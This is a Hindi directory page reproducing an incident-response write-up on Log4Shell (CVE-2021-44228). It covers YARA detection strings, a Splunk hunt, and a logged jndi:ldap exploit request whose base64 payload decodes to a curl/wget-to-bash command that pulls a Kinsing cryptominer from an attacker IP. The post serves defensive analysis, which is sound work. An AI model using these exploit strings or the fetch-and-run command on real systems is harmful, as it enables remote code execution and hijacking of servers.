Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-DFIR-Notes — CVE-2021-44228 DFIR नोट्स | Kitploit
उपकरण/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
भेद्यता विश्लेषणमालवेयर विश्लेषणडिजिटल फोरेंसिकखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रियालॉग विश्लेषण
GitHubazeemering/cve-2021-44228-dfir-notes

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 DFIR नोट्स

रिपॉजिटरी देखें
7224 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228 DFIR-Notes

घर जाते समय मुझे #log4shell कमजोरी के बारे में पहले संदेश मिलने शुरू हुए।

Apache Log4j 2 उपयोगिता के कई संस्करणों को प्रभावित करने वाली एक उच्च गंभीरता वाली कमजोरी (CVE-2021-44228) 9 दिसंबर, 2021 को प्रोजेक्ट के GitHub के माध्यम से सार्वजनिक रूप से प्रकाशित की गई थी। यह कमजोरी, जिसे अलीबाबा क्लाउड सिक्योरिटी टीम के चेन झाओजुन ने खोजा था, Apache Log4j 2 संस्करण 2.0 से 2.14.1 को प्रभावित करती है।

जब मैं घर पहुंचा तो सीधा काम में लग गया। हमेशा की तरह Splunk4tw।

पहला प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट GitHub पर प्रकाशित होने के बाद, खतरा अभिनेताओं ने इस दूरस्थ रूप से शोषण योग्य सुरक्षा दोष के प्रति संवेदनशील सिस्टम के लिए इंटरनेट पर स्कैन करना शुरू कर दिया, जिसके लिए प्रमाणीकरण की आवश्यकता नहीं होती है। नीचे आप उन स्कैनिंग और एक्सप्लॉइट प्रयासों का हिस्सा देखेंगे।

मेरा पहला कदम यह देखना है कि क्या किसी ने प्रारंभिक YARA नियम जारी किया है। यहाँ मिला https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (धन्यवाद फ्लोरियन रोथ)

इसमें डिटेक्शन स्ट्रिंग्स के लिए निम्नलिखित का उल्लेख है: strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

मैं डरा हुआ नहीं हूँ....चलो कुछ CPU का दुरुपयोग करें और सबसे बुरे Splunk सर्च के साथ सीधे वार करें।

index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")

मेरे दोनों iis लॉग और विंडोज इवेंटलॉगिंग (संशोधित) में कुछ हिट्स हैं, और फायरवॉल लॉगिंग पर बहुत सारे ब्लॉक किए गए प्रयास हैं....

IIS: image

WINEVENTLOG: image

IP पता 45.155.205.233 की जाँच कर रहा हूँ.....सेंट पीटर्सबर्ग, रूस.....क्या आश्चर्य है। image

मिला स्ट्रिंग एक क्लासिक पाठ्यपुस्तक अस्पष्ट एन्कोडेड दुर्भावनापूर्ण स्ट्रिंग जैसा दिखता है। देखते हैं यह क्या करता है:

CyberChef का उपयोग करके Base64 स्ट्रिंग को डीकोड करते हैं: 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

image

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl...एक शेल स्क्रिप्ट चलाएँ, bash....हे भगवान। मुझे अंदाजा होने लगा है कि यह गंदा काम क्या करेगा....

चलिए सैंडबॉक्स में curl कमांड चलाते हैं:

image

कोड की 368 लाइनें। (यहाँ चलाएँ यदि आप पूरी स्क्रिप्ट देखना चाहते हैं --> https://reqbin.com/c-ipejxywd

कुछ स्निपेट्स:

image image image

और जब यह समाप्त हो जाता है तो यह लॉग फ़ाइलों को भी साफ़ कर देता है...क्या आश्चर्य है:

image

यह मूल रूप से Kingsin नामक मैलवेयर स्थापित करने का प्रयास करता है, जो एक क्रिप्टो माइनर है। लक्ष्य nix सिस्टम हैं। सुनिश्चित करें कि आप अपने सिस्टम को पैच करें क्योंकि एक्सप्लॉइट का उपयोग संभवतः सभी प्रकार के पेलोड चलाने के लिए किया जाएगा।

शुक्रवार शाम को WhatsApp पर इस बारे में बहस करने के लिए Umbrio से मेरे सहकर्मी मार्टिजन और रॉब [संशोधित] का धन्यवाद। 00:09 बिस्तर का समय।

#अपडेट और अच्छे संसाधन#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

image

टूल डाउनलोड करें